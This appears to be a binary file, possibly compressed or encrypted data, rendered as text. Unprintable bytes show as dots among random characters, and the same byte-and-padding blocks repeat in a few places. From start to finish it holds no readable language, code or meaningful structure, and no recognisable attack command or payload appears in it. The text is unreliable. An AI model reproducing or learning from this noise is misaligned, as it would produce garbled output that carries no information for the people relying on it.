Q..R1.d.i.4..OH...a.V@.H...j\..j,b..\..k....K<...".!.........c:Z...~..y.a;..7...x..?"..y............&p...2.L.2.W..}.E.......$H...A.^.y....r.gX.....    NIj...T.(<G........>[yJ..x.v.....j..._m...A.....c.RG*.V[*.0.(..:..Q|md..?....p...$......t1...H!....X..u$..5<.z_.c,4...F........gU...O_./B.D.+*...W
L..8.e.I....M.....p..nO..-.....t.F_.~..v...Wt.wkH.._..h..TQ...z.o...........:..........p...$...... ..%...........................................................................................................................................................................................................................................................................................................E...:..........p...$...... ..%...........................................................................................................................................................................................................................................................................................................E    .    ........$..A.S^.(.j.9w......./=;k"..`..a...]D....wp.1..Bv[UD.)Q..g)..YC....F..=7.=BI..hc8d.....}..}..5..9{....9afQ.W..r.j5.B^........5.`G.8GG..<O..
.3>.....L...g.....cS.[v.p...}.m..........x.x[.vV.#E.D..`7..Pl.e...<...'.=.B.b...Ac..w@..J?.n+..+.X....q.h.....w.g@.m...7.i.z...|~.....H.....:...h.+|....6Vw.....H..-A.)...^p....a.<;pkM..<.m..d#.....'ow.Q..|.=.......A.e^..=..wC...p..MT0s...R..y...'.)$.`...:*1..b.....R.r.|...H.|}......V.A........+."F...U.c...
k.;..g.T...zX.............@......q..X.@.3.....M.q    ...Q...v.....`...........*ov..O.AZ.@{...dwJt.S8..R..........x3.....Y..B.....A*.N......[.Or....(w.U..'e.Yw...].#E&{w.`...#..k....n...#.c..R..V.."...'g.B.Z...sL{..t.C..=.........|.    .V...S.Y..d.O.z..}8.u.I ..c........y5....5&Y......6N.v'...9...ihD....2'..bR....d...
.y1.........J]..N.....(<!Y..3..    .Gw..Y*.j ...../x?w.....N..R..m9..60...0.`..g.D..5../......ef....u.X.=u..y3
5..."......"..|5St..R.8rd...~...^. n..3~.-.....    ..!s.JNsy}<KngA..#...bEn...m.D.......{'..*2.,W..M.^..d.sgNs..8...'P....IF.M.l`8bo.y.8.TF}j.q...#G..b.._.....\..x%.il..Kk.Br.r,    IE......    .......k.x....M.w..4...!-I7...O..bC...{F...Z.......x...:.. 5.....=lST..
...G.."...|u..:.....m........>.I....g.:.Y.[L..$...#?W.O..z..f..\.m..Lt......^.K.T`.m^....N.z.5........*h*.l....."......'.'.].....s...|V<b...E...Q...n^..:.@.e\..    ..._..&X.0.{b....q..........A..1......
(s8...i.v.....dD...d-.r.I'..0.Hl..g...M.K..TcCL8n....4'?.......w.1Z.,I.U.4...Y......S.......&....3...w..j....@..w.......'.,0:..(xy(n.A..1.....-s.....!3G...;U.9    nM.....+.45}K{x.......''..r..O/.....9Du&.E...?...n....S..|En:eqZ..........fC..a.~B|u^...@i'.a.o....R..g...tw.Q.......5.C/.#........+Yg.....89.....Q. M..U....RV.7..H.xd"..b?$3....c.t..    .5N..0..:%<..../.....T..%v3...9.N.>.:.m..vZ..i7N..1    .;.....L.\...Fe..Z.a..Y..'...O......?B.......br{.@...:.?..3..r...F.L...9....l<BK.....D....m(.d.f..S.de.....'.........    <...cS.*.%.....Hn..e...l.R."L.    3..z..0wr..`N...,.....3mE.q..Z
k.1
a.@[7..xm..K.....L.0...U..g....\.Zf...'.`.a....x.V'&$.G...cm,"..... .O9..Y....|....=.]Fg..B.>i.6.#.|V[.`....
.3...w.9L.........S`.>....$.!^..z....s"<....Zw....5.}.Q..].m...........7...G..    .1....t..9.;....k^.h.3%.#....O.."-.a.....u....}+.G......7.g..    B....v.R....V...L..1>././.q.r.U...%..E.......(m>..Ho..N..oCH.(i...*.......1...<..u...    ...<.&..k..>J.......7o..!    ..........Z{...X...\.QSO./......    
.J.....3..m..b)|.        ...w..:]Z....%..@3.G.F.`..R.!........O5.Y.Uj...U...'...(...i.2{#.
..a%>.EH,y....X......Jqd....dM....$....R......L..........hg{U..a.......T.O..*.)S.....    ....:..........p...$...... ..%...........................................................................................................................................................................................................................................................................................................E...:..........p...$...... ..%...........................................................................................................................................................................................................................................................................................................E    ..........$..Y...?.OO./.f?.Fv.]>....D..o.{.1...L.#oA.._....ZQ...,.i...q...vJ.I.....&v%.!.[.rwl/.seCL....JQ"U.. t..).....P.6..X...5t.s\......m....e.O.#......5Y.X......1.......>.2R.&d.A.\.K.....Am.D....o.3 ...a.Q..X.m.NW.............c.H.m..k.....1.:.....4....rZ....\...".z.OJ..E..4..6O..}C.......M..;....h;|...E...A_|dWM.j.....4!.'n.Q.t
dGl;P..9...m..`.\..z>..;eF.v...Gav1...f.c...I...)....V....C8.....(q.*H.Q.'....!..GSD...d.k....R.....x....XOi..}..zm:7.b....`...T.]......kz/....i..ZD.......R....e.o.k.......y.
,r..!.R.....n...O..:...[.    ..    V..2......~l`........~eG.....e.6.vd.Mx..,.\B.C24.(....v..)&.~}...6.VR..2.4m.M...A.{.......xj.i.q/h+.o.Qn.bG..
...1.'.K....G.).i\......dp.2....0...QjX...6..0.X}H.b....zU.....(mJ..yg.j.....ss^x..#.C..9.......e........Mq..;l..'.*9.....(QK.....=.v.].R....z.Vs%..t..y........{..